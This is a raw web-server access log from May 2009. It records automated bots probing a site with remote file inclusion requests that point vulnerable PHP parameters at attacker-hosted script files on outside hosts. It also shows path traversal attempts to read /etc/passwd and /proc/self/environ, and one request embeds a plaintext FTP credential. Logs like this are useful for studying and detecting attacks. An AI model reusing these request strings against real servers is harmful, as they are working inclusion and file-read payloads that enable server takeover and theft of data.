216.120.237.150 - - [28/May/2009:01:11:09 -0500] "GET /logs/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
216.120.237.150 - - [28/May/2009:01:11:09 -0500] "GET /index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
201.232.54.48 - - [28/May/2009:01:11:34 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:01:11:34 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:01:11:34 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
201.232.54.48 - - [28/May/2009:01:11:40 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://kcaer.re.kr/zboard/icon/id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
62.128.135.52 - - [28/May/2009:01:12:34 -0500] "GET /logs/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.128.135.52 - - [28/May/2009:01:12:34 -0500] "GET /index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.4 - - [28/May/2009:01:17:03 -0500] "GET /logs/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.4 - - [28/May/2009:01:17:03 -0500] "GET /index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.cityhobo.com/components/com_sef/.sef?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.2 - - [28/May/2009:01:25:34 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt??? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
77.221.130.2 - - [28/May/2009:01:25:34 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://208.98.22.241/id.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
218.38.243.71 - - [28/May/2009:01:28:24 -0500] "GET //components/com_virtuemart/imgtag.php?mosConfig_absolute_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:01:28:31 -0500] "GET /logs//components/com_virtuemart/imgtag.php?mosConfig_absolute_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:01:28:46 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/imgtag.php?mosConfig_absolute_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:01:29:12 -0500] "GET /logs/access_log.1237766400/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:01:29:12 -0500] "GET /logs/access_log.1230768000/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:01:29:12 -0500] "GET /errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:01:29:12 -0500] "GET /logs/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.243.71 - - [28/May/2009:01:29:15 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/imgtag.php?mosConfig_absolute_path=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 347 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:01:29:21 -0500] "GET /logs/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:01:29:21 -0500] "GET /errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.146.68.61 - - [28/May/2009:01:29:21 -0500] "GET /logs/access_log.1237766400/errors.php?error=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt????? HTTP/1.1" 404 320 "-""Mozilla/5.0"
80.237.248.146 - - [28/May/2009:01:31:11 -0500] "GET /logs//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 314 "-""XXXXXX"
80.237.248.146 - - [28/May/2009:01:31:11 -0500] "GET //include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 309 "-""XXXXXX"
80.237.248.146 - - [28/May/2009:01:31:11 -0500] "GET //include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""XXXXXX"
80.237.248.146 - - [28/May/2009:01:31:11 -0500] "GET /logs//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""XXXXXX"
61.109.245.179 - - [28/May/2009:01:31:58 -0500] "GET //xoops_lib/modules/protector/onupdate.php?mydirname=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:01:31:58 -0500] "GET /logs//xoops_lib/modules/protector/onupdate.php?mydirname=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:01:31:58 -0500] "GET /logs/access_log.1235347200//xoops_lib/modules/protector/onupdate.php?mydirname=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:01:32:02 -0500] "GET /logs/access_log.1236124800//xoops_lib/modules/protector/onupdate.php?mydirname=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
61.109.245.179 - - [28/May/2009:01:32:02 -0500] "GET /logs/access_log.1235606400//xoops_lib/modules/protector/onupdate.php?mydirname=http://www.babywhisperer.com/default/FX29ID1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
63.147.72.145 - - [28/May/2009:01:38:28 -0500] "GET /logs/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
63.147.72.145 - - [28/May/2009:01:38:28 -0500] "GET /errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
63.147.72.145 - - [28/May/2009:01:38:28 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
63.147.72.145 - - [28/May/2009:01:39:07 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
74.52.164.18 - - [28/May/2009:01:40:54 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=ftp://tokiohot:h-RMH!sbv)tk@62.149.18.34/public_html/v6id.txt??%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
74.52.164.18 - - [28/May/2009:01:40:54 -0500] "GET //modules/xfsection/modify.php?dir_module=ftp://tokiohot:h-RMH!sbv)tk@62.149.18.34/public_html/v6id.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
207.182.143.50 - - [28/May/2009:01:41:13 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:41:13 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:41:15 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:41:39 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:41:39 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:41:40 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.52.164.18 - - [28/May/2009:01:41:54 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=ftp://tokiohot:h-RMH!sbv)tk@62.149.18.34/public_html/v6id.txt??%0D?? HTTP/1.1" 404 317 "-""libwww-perl/5.811"
74.52.164.18 - - [28/May/2009:01:41:54 -0500] "GET //modules/xfsection/modify.php?dir_module=ftp://tokiohot:h-RMH!sbv)tk@62.149.18.34/public_html/v6id.txt??%0D?? HTTP/1.1" 404 312 "-""libwww-perl/5.811"
207.182.143.50 - - [28/May/2009:01:42:12 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:42:16 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:42:16 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:42:17 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:42:46 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:43:21 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:45:18 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:45:18 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:45:18 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
116.36.213.166 - - [28/May/2009:01:46:16 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
116.36.213.166 - - [28/May/2009:01:46:16 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
116.36.213.166 - - [28/May/2009:01:46:17 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:01:46:18 -0500] "GET /logs/access_log.1238889600//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
116.36.213.166 - - [28/May/2009:01:46:52 -0500] "GET /logs/access_log.1237766400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.ks-bank.ru/images/baner.txt?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
65.55.106.110 - - [28/May/2009:01:48:38 -0500] "GET /logs/access_log.1153440000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.117.188.207 - - [28/May/2009:01:52:28 -0500] "GET /logs/access_log.1241049600 HTTP/1.1" 200 163840 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
63.147.72.145 - - [28/May/2009:01:52:55 -0500] "GET //?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
63.147.72.145 - - [28/May/2009:01:52:55 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
63.147.72.145 - - [28/May/2009:01:53:01 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
63.147.72.145 - - [28/May/2009:01:53:08 -0500] "GET /logs/access_log.1241654400//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
65.55.208.125 - - [28/May/2009:01:53:57 -0500] "GET /logs/access_log.1193702400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
125.247.60.3 - - [28/May/2009:01:57:06 -0500] "GET /logs/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
66.70.14.90 - - [28/May/2009:01:57:07 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 332 "-""libwww-perl/5.79"
66.70.14.90 - - [28/May/2009:01:57:07 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327 "-""libwww-perl/5.79"
125.247.60.3 - - [28/May/2009:01:57:14 -0500] "GET /errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
125.247.60.3 - - [28/May/2009:01:57:14 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.16.54 - - [28/May/2009:02:01:32 -0500] "GET //index.php?sourcedir=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.16.54 - - [28/May/2009:02:01:32 -0500] "GET /logs//index.php?sourcedir=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.16.54 - - [28/May/2009:02:01:32 -0500] "GET /logs/access_log.1242000000//index.php?sourcedir=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.16.54 - - [28/May/2009:02:01:37 -0500] "GET /logs/access_log.1241568000//index.php?sourcedir=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
125.247.60.3 - - [28/May/2009:02:02:05 -0500] "GET /logs/access_log.1241136000/errors.php?error=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
38.99.44.102 - - [28/May/2009:02:09:06 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
125.247.60.3 - - [28/May/2009:02:10:38 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 200 191100 "-""Mozilla/5.0"
125.247.60.3 - - [28/May/2009:02:10:39 -0500] "GET //?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
125.247.60.3 - - [28/May/2009:02:10:41 -0500] "GET /logs/access_log.1239408000//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
125.247.60.3 - - [28/May/2009:02:10:46 -0500] "GET /logs/access_log.1241654400//?path%5Bdocroot%5D=http://www.sunggong.tv/shirohige/fxid.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:23 -0500] "GET //include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:23 -0500] "GET /logs//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:25 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
74.208.73.49 - - [28/May/2009:02:12:29 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
74.208.73.49 - - [28/May/2009:02:12:29 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
74.208.73.49 - - [28/May/2009:02:12:30 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
74.208.73.49 - - [28/May/2009:02:12:30 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
207.182.143.50 - - [28/May/2009:02:12:36 -0500] "GET //include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:36 -0500] "GET /logs//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:36 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:36 -0500] "GET //include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:38 -0500] "GET /logs//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:38 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:48 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:54 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:54 -0500] "GET //include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:55 -0500] "GET /logs//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:59 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:59 -0500] "GET /logs//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:59 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:12:59 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:13:02 -0500] "GET //include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:13:07 -0500] "GET //include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:13:07 -0500] "GET /logs/access_log.1231286400//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:13:09 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:13:09 -0500] "GET /logs//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:13:18 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.182.143.50 - - [28/May/2009:02:13:24 -0500] "GET /logs/access_log.1231804800//include/write.php?dir=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
65.55.106.236 - - [28/May/2009:02:16:38 -0500] "GET /logs/access_log.1156377600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.133.241.18 - - [28/May/2009:02:17:49 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.814"
174.133.241.18 - - [28/May/2009:02:17:49 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.814"
174.133.241.18 - - [28/May/2009:02:17:58 -0500] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.814"
174.133.241.18 - - [28/May/2009:02:17:58 -0500] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.nw.or.kr/bbs/icon/omilaid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.814"
158.38.152.250 - - [28/May/2009:02:18:46 -0500] "GET /?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
158.38.152.250 - - [28/May/2009:02:18:46 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
158.38.152.250 - - [28/May/2009:02:18:46 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
158.38.152.250 - - [28/May/2009:02:18:46 -0500] "GET /?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
158.38.152.250 - - [28/May/2009:02:18:47 -0500] "GET /logs/access_log.1239667200/?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
158.38.152.250 - - [28/May/2009:02:18:48 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
158.38.152.250 - - [28/May/2009:02:18:48 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 200 191095 "-""Mozilla/5.0"
158.38.152.250 - - [28/May/2009:02:19:05 -0500] "GET /logs/access_log.1241395200/?DOCUMENT_ROOT=http://www.latinintel-tc.com/pages/fx29id.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
89.108.85.158 - - [28/May/2009:02:19:34 -0500] "GET /logs/index.php?conteudo=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
89.108.85.158 - - [28/May/2009:02:19:35 -0500] "GET /index.php?conteudo=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
65.55.106.229 - - [28/May/2009:02:20:08 -0500] "GET /logs/access_log.1164412800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
62.141.54.240 - - [28/May/2009:02:20:32 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 332 "-""libwww-perl/5.803"
62.141.54.240 - - [28/May/2009:02:20:32 -0500] "GET //components/com_simpleboard/image_upload.php?sbp=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 327 "-""libwww-perl/5.803"
66.249.65.36 - - [28/May/2009:02:20:37 -0500] "GET /icons/image2.gif HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
116.36.213.166 - - [28/May/2009:02:20:50 -0500] "GET /index.php?conteudo=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
